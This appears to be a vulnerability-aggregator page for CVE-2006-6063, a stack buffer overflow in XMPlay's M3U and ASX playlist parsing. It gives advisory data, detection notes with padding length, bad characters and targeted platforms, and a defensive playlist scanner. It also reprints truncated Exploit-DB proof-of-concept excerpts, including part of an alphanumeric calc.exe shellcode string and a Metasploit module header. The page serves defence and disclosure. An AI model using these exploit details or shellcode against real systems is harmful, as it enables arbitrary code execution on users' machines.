CVE-2006-6063
Published 2006-11-22
Priority P350 · high · 7.5 CVSS 2.0
Vector: AV:N/AC:L/Au:N/C:P/I:P/A:P
Exploit available
EPSS: 58.08% (99.0th percentile)
Stack-based buffer overflow in Un4seen XMPlay 3.3.0.5 and earlier allows remote attackers to execute arbitrary code via a M3U file containing a long (1) FileName, and cause a crash via a long (2) DisplayName.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| un4seen | xmplay | <= 3.3.0.5 | — |
Detection & IOCs
- Detect an oversized FileName field (>498 bytes) in M3U or ASX playlist files parsed by XMPlay; the exploit uses 498 bytes of padding before the return address overwrite.
- Flag M3U files with an #EXTINF FileName field exceeding ~500 bytes, as this triggers the stack buffer overflow in XMPlay 3.3.0.5 and earlier.
- Detect ASX playlist files with an overly long filename attribute (href/ref value), as the ASX format is also exploitable via the same boundary error.
- Payload bad characters for this exploit are: \x00\x09\x0a\x0d\x20\x22\x25\x26\x27\x2b\x2f\x3a\x3c\x3e\x3f\x40; the encoded payload will be alphanumeric uppercase, so detect long alphanumeric-only strings in playlist filename fields.
- Using the DisplayName field of M3U for overflow may trigger Windows DEP; FileName field exploitation is the primary attack vector to monitor.
- Return addresses are platform-specific; the Metasploit module targets Windows 2000 Pro SP4 and Windows XP Pro SP2 English only.
- Payload space is limited to 750 bytes and requires AlphanumUpper encoding, meaning raw shellcode detections will not match without accounting for the encoding.
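The length and character-class checks listed above can be run over playlist files before they reach a player. The following Python scanner is an added example, not code from this page or from any of the indexed sources. The function names, the 200-character alphanumeric run threshold, and the treatment of every non-comment M3U line as a FileName entry are assumptions.

```python
import re

MAX_FIELD = 498  # bytes of padding the page cites before the return address
ALNUM_RUN = re.compile(rb"[A-Za-z0-9]{200,}")  # assumed run length; tune locally
ASX_HREF = re.compile(rb"""href\s*=\s*(?:"([^"]*)"|'([^']*)')""", re.I)

def _check(field, value, where, findings):
    """Record a finding when a field is oversized or looks like encoded payload."""
    reasons = []
    if len(value) > MAX_FIELD:
        reasons.append(f"length {len(value)} > {MAX_FIELD}")
    if ALNUM_RUN.search(value):
        reasons.append("long alphanumeric-only run")
    if reasons:
        findings.append((where, field, "; ".join(reasons)))

def scan_m3u(data):
    """FileName = each non-comment line; DisplayName = text after the comma in #EXTINF."""
    findings = []
    for n, raw in enumerate(data.splitlines(), 1):
        line = raw.strip()
        if line.upper().startswith(b"#EXTINF:"):
            _, _, display = line.partition(b",")
            _check("DisplayName", display, f"line {n}", findings)
        elif not line.startswith(b"#"):
            _check("FileName", line, f"line {n}", findings)
    return findings

def scan_asx(data):
    """ASX is XML-like but often malformed, so match href attributes by regex."""
    findings = []
    for m in ASX_HREF.finditer(data):
        value = m.group(1) if m.group(1) is not None else m.group(2)
        line_no = data.count(b"\n", 0, m.start()) + 1
        _check("href", value, f"line {line_no}", findings)
    return findings

def scan_playlist(name, data):
    """Dispatch on file extension (hypothetical helper for this example)."""
    return scan_asx(data) if name.lower().endswith(".asx") else scan_m3u(data)

# Constructed samples: benign filler only, sized to cross the 498-byte threshold.
BENIGN_M3U = b"#EXTM3U\n#EXTINF:215,Artist - Title\nC:\\Music\\track01.mp3\n"
LONG_M3U = b"#EXTM3U\n#EXTINF:1,x\n" + b"A" * 600 + b".mp3\n"
LONG_ASX = b'<asx version="3.0"><entry><ref href="' + b"B" * 600 + b'"/></entry></asx>'
```

The scanner works on raw bytes because the threshold is a byte count; a file with legitimately long URLs will also be flagged and needs manual review.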
VulDB
Un4seen XMPlay 3.3.0.5 stack-based overflow (EDB-2815 / XFDB-30436)
vuldb·2026-04-28·CVSS 7.5
A vulnerability marked as critical has been reported in Un4seen XMPlay 3.3.0.5. Impacted is an unknown function. The manipulation leads to stack-based buffer overflow.
This vulnerability is documented as CVE-2006-6063. The attack can be initiated remotely. Additionally, an exploit exists.
GHSA
GHSA-mpf5-553f-w43r: Stack-based buffer overflow in Un4seen XMPlay 3
ghsa_unreviewed·2022-05-01
Stack-based buffer overflow in Un4seen XMPlay 3.3.0.5 and earlier allows remote attackers to execute arbitrary code via a M3U file containing a long (1) FileName, and cause a crash via a long (2) DisplayName.
No detection rules found.
Exploit-DB
XMPlay 3.3.0.4 - '.ASX' Filename Buffer Overflow (Metasploit)
exploitdb·2010-05-09
---
##
# $Id: xmplay_asx.rb 9262 2010-05-09 17:45:00Z jduck $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 'XMPlay 3.3.0.4 (ASX Filename) Buffer Overflow',
'Description' => %q{
This module exploits a stack buffer overflow in XMPlay 3.3.0.4.
The vulnerability is caused due to a boundary error within
the parsing of playlists containing an overly long file name.
This module uses the ASX file format.
},
'License' => MSF_LICENSE,
'Author' => 'MC',
'Version' => '$Revision: 9262 $',
'
Exploit-DB
XMPlay 3.3.0.4 - '.ASX' Filename Local Buffer Overflow
exploitdb·2006-11-21
---
/*
0-day XMPlay 3.3.0.4 .ASX Filename Buffer Overflow Exploit
XMPlay 3.3.0.4 and lower experience a stack-based buffer overflow when
loading malformed .ASX files
This merely executes CALC.exe but you could always add your own custom
shellcode (alpha2)
ASX
Reported Exploit Date: 11/21/2006
*/
#include
#include
#include
int main(int argc, char *argv[])
{
FILE *Exploit;
char buffer[512];
/* Executes Calc.exe Alpha2 Shellcode Provided by Expanders */
unsigned char scode[] =
"TYIIIIIIIIIIIIIIII7QZjAXP0A0AkAAQ2AB2BB0BBABXP8ABuJI"
"YlHhQTs0s0c0LKcuwLLK1ls52Xs1JONkRofxNkcoUpUQZKCylK4tLKuQxnTqo0LYnLMTkpptUWiQ9ZdM"
"5QO2JKZT5k2tUtUTPuKULKQOfDc1zKPfNkflrkNkSowlvaZKLK5LlKgqxkMYqL14wtYSFQkpcTNkQPtp"
"LEiPd8VlNkqPVllKPp7lNMLK0htHj
Exploit-DB
XMPlay 3.3.0.4 - '.M3U' Filename Local Buffer Overflow
exploitdb·2006-11-20
---
/*
0-day XMPlay 3.3.0.4 .M3U Filename Buffer Overflow Exploit
XMPlay 3.3.0.4 and lower experience a stack-based buffer overflow when
loading malformed M3U files (probably PLS and ASX files as well).
This merely executes CALC.exe but you could always add your own custom
shellcode (alpha2)
Either the DisplayName field of the M3U or the FileName field can be
used to exploit the system, but during my tests, using the DisplayName
field caused Windows DEP to activate. (English Windows XP SP2)
Huge Greets and Thanks to Expanders (expanders[at]gmail[dot]com)
Who I presented the PoC and Discovery to, and he wrote the first PoC
Exploit for it. And Jerome Athias for some neat tools. Both of these
guys are very talented, keep up the good
Metasploit
XMPlay 3.3.0.4 (ASX Filename) Buffer Overflow
metasploit
This module exploits a stack buffer overflow in XMPlay 3.3.0.4. The vulnerability is caused due to a boundary error within the parsing of playlists containing an overly long file name. This module uses the ASX file format.
No writeups or analysis indexed.
- http://secunia.com/advisories/22999
- http://www.securityfocus.com/bid/21206
- http://www.vupen.com/english/advisories/2006/4636
- https://exchange.xforce.ibmcloud.com/vulnerabilities/30436
- https://www.exploit-db.com/exploits/2815